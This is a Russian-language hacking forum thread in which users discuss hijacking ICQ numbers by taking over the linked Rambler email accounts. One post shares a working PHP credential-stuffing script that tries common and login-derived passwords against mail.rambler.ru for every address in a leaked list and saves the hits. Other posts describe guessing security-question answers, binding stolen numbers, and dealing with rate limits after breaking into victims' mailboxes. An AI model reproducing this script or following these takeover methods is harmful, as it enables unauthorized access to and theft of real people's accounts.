А ты знаешь, что такое брут? я знаю, что я показал, ты говоришь о том, что ты увидел. Серьёзно? Куча номеров, на которых пароль из мыла такой же как и пароль для аси (но не login=pass) это твоё мнение, ога? В видео показан принцип. СИ для тех, у кого голова варит. По этому поводу всё чётко и отмечено, сначала рекомендую почитать, а потом посмотреть. это твой вывод, ога? Кто с тобой спорит? мой пост #13, я тебе всё сказал предельно чётко и ясно, если ты не увидел СИ - твоя проблема. Брут не вытаскивает всю возможную информацию. По поводу того что я показал: показал я, люди начали пробовать, что-то делать, а не продолжать тупые неосмысленные копи-пасты с форума. IPD заставить работать для многих проблема, у многих результатов нет. А те у кого голова есть, получат результат данным способом. Да и что это я вовсе? Человек мне говорит о СИ, а сам ниразу, думаю, не зделал данный хек. Теоретики? Да, это хорошо, но я уже жксперементально опроверг:
/me гордится собой. пока все спорят написал чекер с ИИ и начал чекить все мыла из листа. если что соберет, то me выложит это в халяве
мда судя по всему на рамлере никаких ограничений на логин по поп3 и с веба нету =) и они сделали еще такую удобную фишку при логине через веб, прям спецом для брутеров, чтобы трафа было как можно меньше и соотвественно скорость =)) молодцы они =))
тема хорошая, к одному мылу ответ подобрал, но вот беда.. пасс ушёл на другое мыло жертвы. чаще всего вопрос - девичья фамилия мамки, спрашивать в разводе как то подозрительно будет
натйе =) чекайте брутером с ИИ PHP: <?php set_time_limit(0) or die('mda'); $f = fopen('icq.text', 'r') or die('file not exists'); while(!feof($f)){ $data = rtrim(fgets($f)); $email = explode(';', $data); $email = $email[1]; $email = explode('@', $email); $email = $email[0]; $password = array( 'password', 'password1', 'qwerty', '123456', 'abc123', 'monkey', 'blink182', 'qazwsx', 'asddfg', 'zxcvb', '123qwe', 'qwe123' ); $new_password = explode('@', $email); $password = array_merge($password, $new_password); $new_password = explode('.', $password[1]); $password = array_merge($password, array($new_password[0])); $new_password = preg_replace('/\d/i', '', $email); $new_password = explode('@', $new_password); $new_password = $new_password[0]; $password = array_merge($password, array($new_password)); foreach($password as $pass){ if($pass){ if(check_pass($pass)){ break; } } sleep(1); } } fclose($f);die('Results writed to good'); function check_pass($pass){ global $email; $cp = fsockopen('mail.rambler.ru', 80, $errno, $errstr, 10) or die('ramlber.ru is down =\ '); $r = "GET /script/auth.cgi?login=$email&passw=$pass HTTP/1.1\r\nHost: mail.rambler.ru\r\n\r\n"; fputs($cp, $r); $str = fgets($cp); $i++; if(stristr($str, '302')){ $good = fopen('good', 'a');fwrite($good, $email.':'.$pass."\n");fclose($good); echo 'found...'.$email.'<br>'; return true; }else{ $bad = fopen('bad', 'a');fwrite($bad, $email.':'.$pass."\n");fclose($bad); } fclose($cp); return false; } ?> на код не обращайте внимания, в начала он был для поп3 =)
GreenBear я конечно уважаю, но тема не про это, здесь я пытаюсь научить людей думать и ломать ручками. По поводу брута: Brute-force - метод перебора паролей грубой силой. Брут берёт колличеством. Ай, что я распинаюсь, делайте копи-пасты и брутьте дальше.
Вообщем не надо это Вам, значит больше не буду тратить ни своё время ни Ваше. Для тех, кому было интересно продолжение, я расскажу и покажу: С помощью всё той же СИ мы проникаем в сознание жертвы и получаем этот номер (для особо непонятливых у меня был пароль и я привязал номер к рамблеру) Но я не алчный и взлом для меня - это искусство, а не способ наживы. Поэтому номером я не завладел окончательно, я решил поиграть с хозяином и заснять видео, как я получу номер ещё раз, думаю у меня это получилось бы... Ну что ещё сказать, господа крутые хакеры, Вы круче всех. Тем кому всё-таки понравилось и было интересно: извините, но желание напрочь отпало делиться знаниями и умениями. В разделе 8 модераторов, может они Вас чему-нибудь научат... Спасибо.
вообще у меня там лишь пароли созданые из логина как можно заметить =) + несколько популярный, так что =\
Social Engineer, а мне понравился твой визуал хак.. оч познавательно, смог угнать 1 шоху.. лови + вобщем)) и не обращай внимания на этих брутеров, просто они считают, что их "гениальный" моск сможет придумать еще один пасс на который они снимуть парочку другую десятков шох и семерок.. хотя в общем то оба метода похожи, нужно думать и соображать головой, причем достаточно изобретательно..
Мда.. из серии угадай пароль к мылу. На везение и на терпение. =\ >>8 модераторов, может они Вас чему-нибудь научат... Модератор в переводе с немецкого означает ведущий, а не учитель. лол =)
Пасс на мыло я нашел.Зашел на мыло,а мыло не прямое.Зато там есть письма от регистрации его аски.Это чтонить дает?.И вообще эта аська точно его.Тока он наверно от раблера отвязал ее.Ктонить знает что делать?
А что делать если рамблеру не понравилось что от меня много запросов на востановление пароля. Ждать 2 часа как то не вариант...